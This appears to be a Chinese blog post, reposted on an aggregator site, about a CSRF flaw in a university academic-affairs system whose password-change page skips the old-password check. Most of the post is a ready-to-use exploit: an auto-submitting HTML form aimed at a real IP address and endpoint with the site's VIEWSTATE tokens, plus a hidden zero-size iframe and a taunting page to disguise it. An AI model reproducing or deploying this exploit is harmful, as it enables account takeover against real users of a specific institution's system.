美文网首页
偶然在教务处发现csrf漏洞

偶然在教务处发现csrf漏洞

作者: gelinlang | 来源:发表于2019-03-29 18:50 被阅读0次

教务处修改密码界面如下:


1.png

正常情况此处需要输出原密码,不会造成csrf漏洞。
但是此处的原密码是个纸老虎,不需要原来的密码,随便输个123456都行,这里没有检测的。(我们学校程序员居然偷懒!!!)
csrf代码如下:

<html>
  <body onload="document.getElementById('go').submit()">
    <form id="go" action="http://202.115.133.173:805/ModiPassWord.aspx" method="POST">
      <input type="hidden" name="&#95;&#95;VIEWSTATE" value="&#47;wEPDwUJNTM4ODk4MzYyD2QWAmYPZBYCAgMPZBYGZg8WAh4EVGV4dAUJ5Y2T6Iy55p2tZAIBDxYCHwAFDDIwMTYxMzE2MDcxNGQCAg9kFgICAQ9kFghmDxYCHwAFCeWNk&#43;iMueadrWQCAQ8WAh8ABRLnvZHnu5zlronlhajlrabpmaJkAgIPFgIfAAUQMTcwMui9r&#43;S7tuW3peeoi2QCAw8WAh8ABQwyMDE2MTMxNjA3MTRkZM2cZwst9wh6BaCcCBjxJ6n&#43;TrZmpK5wdEoBdJjVxZTV" />
      <input type="hidden" name="&#95;&#95;VIEWSTATEGENERATOR" value="B1C5939B" />
      <input type="hidden" name="&#95;&#95;EVENTVALIDATION" value="&#47;wEdAAVwUaUwO1bgJ7LJU6RWoNWl2bK4eTBGWi2U4IqNVYtL5nDvn2yJ7M75w2K&#47;2upfeT4Bxpy0WPfutMPmI6IniVAxv8qihCTLkiMq5qd7QZvlx7Y3Ca2tb5DJ&#43;zkC2dlIer&#43;LPJBAqtOGGwuhwR4TwYul" />
      <input type="hidden" name="ctl00&#36;Content&#36;txtOldPwd" value="oldpasswd" />
      <input type="hidden" name="ctl00&#36;Content&#36;txtNewPwd" value="newpasswd" />
      <input type="hidden" name="ctl00&#36;Content&#36;txtRPwd" value="newpasswd" />
      <input type="hidden" name="ctl00&#36;Content&#36;btnSubmit" value="" />
    </form>
  </body>
</html>

在登录教务处后访问页面,成功修改密码。

还可以用iframa标签隐藏代码,增加混淆性。

<iframe src="csrf.html" width="0" height="0"></iframe>
<h1 style="color:red ; font-size:50px">还不看下手机,你的QQ密码被我改了</h1>

简单的测试页面如下:

2.png

相关文章

  • 偶然在教务处发现csrf漏洞

    教务处修改密码界面如下: 正常情况此处需要输出原密码,不会造成csrf漏洞。但是此处的原密码是个纸老虎,不需要原来...

  • CRSF

    CSRF漏洞概述 Cross-site request forgery简称为“CSRF",在CSRF的攻击场景中攻...

  • 安全包开发整体架构

    SSRF防御 SSRF安全漏洞以及防御实现 XSS防御 xss漏洞以及防御实现 CSRF防御 CSRF安全漏洞以及...

  • CSRF(跨站请求伪造)漏洞

    CSRF漏洞概述 CSRF是OWASP TOP10报告中危害较高的漏洞。 Cross-site request f...

  • DWVA手把手教程(三)——CSRF漏洞

    欢迎来到CSRF漏洞章节,在此,请允许作为#灵魂画师!!#的我图文并茂的为大家简单介绍一下CSRF漏洞: CSRF...

  • Web 开发常见安全问题

    前端安全XSS 漏洞CSRF 漏洞 后端安全SQL 注入漏洞权限控制漏洞SESSION 与 COOKIEIP 地址...

  • 从CSRF到用户信息泄漏,XSS和完整帐户接管

    0x00前言 CSRF漏洞的严重性在很大程度上取决于漏洞的位置。有时,错误的CSRF保护机制会导致无关紧要的问题,...

  • CSRF 漏洞

    相关课程的线上实验版本已投递到实验楼,实验楼在线教育平台提供非常优秀的在线实验环境,建议有兴趣的朋友可以看看:点击...

  • CSRF漏洞

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 CSRF(Cross-site request for...

  • CSRF漏洞

    CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Atta...

网友评论

      本文标题:偶然在教务处发现csrf漏洞

      本文链接:https://www.haomeiwen.com/subject/psurbqtx.html